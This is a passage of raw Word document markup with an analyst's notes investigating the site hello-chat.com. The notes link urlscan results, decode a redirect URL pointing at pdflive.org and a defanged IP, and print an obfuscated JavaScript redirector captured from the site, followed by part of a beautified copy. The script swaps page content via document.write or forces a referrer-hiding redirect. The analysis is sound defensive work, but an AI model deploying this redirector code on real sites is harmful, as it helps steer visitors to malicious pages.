    <w:p w14:paraId="7EA4D954" w14:textId="29592D71" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r w:rsidRPr="000D4640">
        <w:t>hello-chat.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31142D" w14:textId="77777777" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="7A93294E" w14:textId="5BC78848" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r w:rsidRPr="000D4640">
        <w:t>https://urlscan.io/result/a5420f92-489f-4922-903d-f54fb8410cc3/#summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C41524" w14:textId="77777777" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="4BA2F4D9" w14:textId="505BA963" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6499F134" wp14:editId="3C27B0AB">
            <wp:extent cx="5943600" cy="3373755"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="17145"/>
            <wp:docPr id="12" name="Picture 12" descr="Graphical user interface, text, application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, text, application, website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73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7E1746" w14:textId="0423AFE0" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="681ED347" w14:textId="0D780AB0" w:rsidR="000D4640" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId28" w:anchor="transactions" w:history="1">
        <w:r w:rsidR="000D4640" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/result/a5420f92-489f-4922-903d-f54fb8410cc3/#transactions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E47F7A1" w14:textId="513EA7B3" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="2D9CFE7C" w14:textId="1892CF96" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5332671C" wp14:editId="02A01D8F">
            <wp:extent cx="5943600" cy="3557270"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="11430"/>
            <wp:docPr id="13" name="Picture 13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raphical user interface, application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72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6D4980" w14:textId="6CEAE670" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="60F7AC7A" w14:textId="11528798" w:rsidR="000D4640" w:rsidRDefault="00A9388A">
      <w:r>
        <w:t>------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD88053" w14:textId="44056724" w:rsidR="000D4640" w:rsidRDefault="00A9388A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E52A832" wp14:editId="6C7DEC51">
            <wp:extent cx="5943600" cy="2846705"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="10795"/>
            <wp:docPr id="14" name="Picture 14" descr="Graphical user interface, application, table, Exc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Graphical user interface, application, table, Excel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67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086D01" w14:textId="664A7755" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="51D0EC04" w14:textId="56FB441F" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="00713DF8" w14:textId="6C997328" w:rsidR="000D4640" w:rsidRDefault="00A9388A">
      <w:r>
        <w:t>We need to decode the url that goes to 91.228.155[.]148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3B0FA" w14:textId="1B0952F2" w:rsidR="00A9388A" w:rsidRDefault="00A9388A"/>
    <w:p w14:paraId="5949C779" w14:textId="77777777" w:rsidR="00A9388A" w:rsidRDefault="00067395" w:rsidP="00A9388A">
      <w:hyperlink r:id="rId31" w:anchor="filename:%22vPrCBJ?return=js.client&amp;&amp;se_referrer=&amp;default_keyword=&amp;landing_url=hello-chat.com%2F&amp;name=_P4SskFQV6wKbMxfB&amp;host=https%3A%2F%2Fpdflive.org%2FvPrCBJ%22" w:history="1">
        <w:r w:rsidR="00A9388A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
            <w:color w:val="18BC9C"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>vPrCBJ?return=js.client&amp;&amp;se_referrer=&amp;default_keyword=&amp;landing_url=hello-chat.com%2F&amp;name=_P4SskFQV6wKbMxfB&amp;host=https%3A%2F%2Fpdflive.org%2FvPrCBJ</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00A9388A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
            <w:color w:val="FFFFFF"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="single" w:sz="12" w:space="1" w:color="95A5A6" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="95A5A6"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r w:rsidR="00A9388A">
          <w:rPr>
            <w:rStyle w:val="hidden-sm"/>
            <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
            <w:color w:val="FFFFFF"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="single" w:sz="12" w:space="1" w:color="95A5A6" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="95A5A6"/>
          </w:rPr>
          <w:t>Show response</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A9388A">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A9388A">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pdflive.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBFC583" w14:textId="7E764AC4" w:rsidR="00A9388A" w:rsidRDefault="00A9388A"/>
    <w:p w14:paraId="1B1F2AEE" w14:textId="6A6E6870" w:rsidR="00A9388A" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidR="006939C3" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://meyerweb.com/eric/tools/dencoder/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13C841C5" w14:textId="28A9741E" w:rsidR="006939C3" w:rsidRDefault="006939C3"/>
    <w:p w14:paraId="07D87E2A" w14:textId="028F0780" w:rsidR="006939C3" w:rsidRDefault="006939C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="441F6629" wp14:editId="66D84926">
            <wp:extent cx="5943600" cy="3663950"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="19050"/>
            <wp:docPr id="15" name="Picture 15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text, application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63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22E231" w14:textId="094C4726" w:rsidR="006939C3" w:rsidRDefault="006939C3"/>
    <w:p w14:paraId="4E522C02" w14:textId="416F3333" w:rsidR="006939C3" w:rsidRDefault="006939C3"/>
    <w:p w14:paraId="620C09A3" w14:textId="02DA9174" w:rsidR="006939C3" w:rsidRDefault="006939C3"/>
    <w:p w14:paraId="160ABD73" w14:textId="2F4986F4" w:rsidR="006939C3" w:rsidRDefault="006939C3">
      <w:r w:rsidRPr="006939C3">
        <w:t>vPrCBJ?return=js.client&amp;&amp;se_referrer=&amp;default_keyword=&amp;landing_url=hello-chat.com/&amp;name=_P4SskFQV6wKbMxfB&amp;host=https://pdflive.org/vPrCBJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD8D7A" w14:textId="1C8952FF" w:rsidR="006939C3" w:rsidRDefault="006939C3"/>
    <w:p w14:paraId="5B41B3A9" w14:textId="77777777" w:rsidR="006939C3" w:rsidRDefault="006939C3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72083BCB" w14:textId="40EAD567" w:rsidR="005350C2" w:rsidRDefault="005350C2"/>
    <w:p w14:paraId="0C09B799" w14:textId="5DE9E970" w:rsidR="005350C2" w:rsidRDefault="005350C2">
      <w:r>
        <w:t>we also need to examine the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD5F20" w14:textId="23274EFB" w:rsidR="005350C2" w:rsidRDefault="005350C2"/>
    <w:p w14:paraId="360DAC81" w14:textId="2C703B58" w:rsidR="005350C2" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="005350C2" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/responses/99fd73bb8f87a4ffa338c76244391f604f77a8343019a4fb666d50adb1d87be9/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D69BE2A" w14:textId="3D4ECAB6" w:rsidR="005350C2" w:rsidRDefault="005350C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C3791E" wp14:editId="1A538C69">
            <wp:extent cx="5943600" cy="1129030"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="13970"/>
            <wp:docPr id="16" name="Picture 16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raphical user interface&#10;&#10;Description automatically generated with medium confidence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90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5E05DB" w14:textId="0C137489" w:rsidR="005350C2" w:rsidRDefault="005350C2"/>
    <w:p w14:paraId="0BBE2185" w14:textId="77777777" w:rsidR="005350C2" w:rsidRDefault="005350C2" w:rsidP="005350C2">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>var _3y4mJ3mhqd3pv2HY=function(n){var o={};function r(t){if(o[t])return o[t].exports;var e=o[t]={i:t,l:!1,exports:{}};return n[t].call(e.exports,e,e.exports,r),e.l=!0,e.exports}return r.m=n,r.c=o,r.d=function(t,e,n){r.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},r.r=function(t){"undefined"!=typeof Symbol&amp;&amp;Symbol.toStringTag&amp;&amp;Object.defineProperty(t,Symbol.toStringTag,{value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(e,t){if(1&amp;t&amp;&amp;(e=r(e)),8&amp;t)return e;if(4&amp;t&amp;&amp;"object"==typeof e&amp;&amp;e&amp;&amp;e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&amp;t&amp;&amp;"string"!=typeof e)for(var o in e)r.d(n,o,function(t){return e[t]}.bind(null,o));return n},r.n=function(t){var e=t&amp;&amp;t.__esModule?function(){return t.default}:function(){return t};return r.d(e,"a",e),e},r.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},r.p="",r(r.s=0)}([function(t,e,n){"use strict";var o=this&amp;&amp;this.__assign||function(){return(o=Object.assign||function(t){for(var e,n=1,o=arguments.length;n&lt;o;n++)for(var r in e=arguments[n])Object.prototype.hasOwnProperty.call(e,r)&amp;&amp;(t[r]=e[r]);return t}).apply(this,arguments)},r=this&amp;&amp;this.__importDefault||function(t){return t&amp;&amp;t.__esModule?t:{default:t}};Object.defineProperty(e,"__esModule",{value:!0});var i=r(n(1)),c=(u.prototype.getSubId=function(){return this.config.subid},u.prototype.getPath=function(){return this.config.P_PATH||""},u.prototype.useStream=function(){return this.config.stream||!1},u.prototype.changeContent=function(){i.default(this.config)},u.prototype.debugMode=function(){this.config.debug&amp;&amp;this.clearStorage()},u.prototype.saveConfig=function(){!this.config.debug&amp;&amp;this.config.unique&amp;&amp;(localStorage.setItem("subId",this.config.subid),void 0!==this.config.token&amp;&amp;localStorage.setItem("token",this.config.token),localStorage.setItem("config",JSON.stringify(this.config)))},u.prototype.getInitParams=function(){window._P4SskFQV6wKbMxfB&amp;&amp;(this.config=o(o({},this.config),window._P4SskFQV6wKbMxfB),this.config.debug&amp;&amp;this.debugMode()),this.config.created_at=Math.round(new Date/1e3);var t=localStorage.getItem("config");null!=t&amp;&amp;(this.config=JSON.parse(t))},u.prototype.clearStorage=function(){localStorage.removeItem("subId"),localStorage.removeItem("token"),localStorage.removeItem("config")},u);function u(t){this.config=t,this.getInitParams(),this.saveConfig(),this.changeContent()}e.Client=c;e.client=new c({subid:"3154ba7btkom",token:"",content:{"body":"","headers":[],"status":200,"contentType":"","uniqueness_cookie":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiM1wiOjE2MzEyMTUzNTV9LFwidGltZVwiOjE2MzEyMTUzNTV9In0.z2qjBQsHYV-iXM874UMvGMHgHSsMJ6pCo7anohGj9HM","cookies_ttl":24,"cookies":{"_subid":"3154ba7btkom","f6aba":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wiY2FtcGFpZ25zXCI6e1wiM1wiOjE2MzEyMTUzNTV9LFwidGltZVwiOjE2MzEyMTUzNTV9In0.z2qjBQsHYV-iXM874UMvGMHgHSsMJ6pCo7anohGj9HM"}},debug: false})},function(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0});e.default=function(t){if(void 0!==t.content){if(200===t.content.status&amp;&amp;""!==t.content.body)return document.open(),document.write((n=t.content.body,decodeURIComponent(atob(n).split("").map(function(t){return"%"+("00"+t.charCodeAt(0).toString(16)).slice(-2)}).join("")))),void document.close();if(301===t.content.status||302===t.content.status){var e=t.content.headers[0].replace("Location: ","");return document.open(),document.write("&lt;html&gt;&lt;head&gt;"),document.write('&lt;meta name="referrer" content="never" /&gt;'),document.write('&lt;meta http-equiv="refresh" content="0;url='+e+'" /&gt;'),document.write("&lt;/head&gt;&lt;/html&gt;"),void document.close()}}var n}}]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A544E" w14:textId="47311871" w:rsidR="005350C2" w:rsidRDefault="005350C2"/>
    <w:p w14:paraId="4183744D" w14:textId="6B119239" w:rsidR="005350C2" w:rsidRDefault="005350C2"/>
    <w:p w14:paraId="1C239643" w14:textId="77777777" w:rsidR="005350C2" w:rsidRDefault="005350C2"/>
    <w:p w14:paraId="59B7D86F" w14:textId="599C9E28" w:rsidR="000D4640" w:rsidRDefault="00FA1767">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>we need to beautify the code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C4616" w14:textId="1CC9A6DE" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="7F134333" w14:textId="00E275A7" w:rsidR="00FA1767" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00FA1767" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://beautifier.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="600D0979" w14:textId="0AC83527" w:rsidR="00FA1767" w:rsidRDefault="00FA1767"/>
    <w:p w14:paraId="3DABD676" w14:textId="4DC045E3" w:rsidR="00FA1767" w:rsidRDefault="00FA1767">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6445FDB0" wp14:editId="7F62D0D4">
            <wp:extent cx="5943600" cy="2914650"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="19050"/>
            <wp:docPr id="17" name="Picture 1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raphical user interface, application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4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61B59E" w14:textId="5E812FA9" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="1D0E4841" w14:textId="47F6A1A1" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="1F61C19C" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t>var _3y4mJ3mhqd3pv2HY = function(n) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044D3F63" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    var o = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228577E8" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767"/>
    <w:p w14:paraId="7555C8EF" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    function r(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770A67DD" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        if (o[t]) return o[t].exports;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653F90FA" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        var e = o[t] = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A9C539" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            i: t,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560005F4" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            l: !1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F15135" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            exports: {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C549DB" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AF03BE" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        return n[t].call(e.exports, e, e.exports, r), e.l = !0, e.exports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152F57CF" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54485420" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    return r.m = n, r.c = o, r.d = function(t, e, n) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D024BE" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        r.o(t, e) || Object.defineProperty(t, e, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E740D" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            enumerable: !0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2456E746" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            get: n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F32606" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06737E" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    }, r.r = function(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65899545" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        "undefined" != typeof Symbol &amp;&amp; Symbol.toStringTag &amp;&amp; Object.defineProperty(t, Symbol.toStringTag, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A305281" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            value: "Module"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADA01EB" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        }), Object.defineProperty(t, "__esModule", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78887327" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            value: !0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B696C1" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C2400E" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    }, r.t = function(e, t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F204009" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        if (1 &amp; t &amp;&amp; (e = r(e)), 8 &amp; t) return e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13458924" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        if (4 &amp; t &amp;&amp; "object" == typeof e &amp;&amp; e &amp;&amp; e.__esModule) return e;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAAE4E5" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        var n = Object.create(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501C1595" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        if (r.r(n), Object.defineProperty(n, "default", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6074E0A6" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                enumerable: !0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB333E" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                value: e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A49C3CA" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            }), 2 &amp; t &amp;&amp; "string" != typeof e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8F65F" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            for (var o in e) r.d(n, o, function(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16407A20" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                return e[t]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4299C869" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            }.bind(null, o));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA331F" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        return n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C77F0F9" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    }, r.n = function(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60644996" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        var e = t &amp;&amp; t.__esModule ? function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0267E420" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            return t.default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A750ED" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        } : function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD881DF" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            return t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB1675" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A998D86" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        return r.d(e, "a", e), e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD733CF" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    }, r.o = function(t, e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEB55C8" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">        return Object.prototype.hasOwnProperty.call(t, e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68469B5E" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    }, r.p = "", r(r.s = 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C34A73" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t>}([function(t, e, n) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C0DCC" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    "use strict";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A13DD" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">    var o = this &amp;&amp; this.__assign || function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7558ED6F" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">            return (o = Object.assign || function(t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99A798" w14:textId="77777777" w:rsidR="00FA1767" w:rsidRDefault="00FA1767" w:rsidP="00FA1767">
      <w:r>
        <w:t xml:space="preserve">                for (var e, n = 1, o = arguments.length; n &lt; o; n++)</w:t>
      </w:r>
    </w:p>
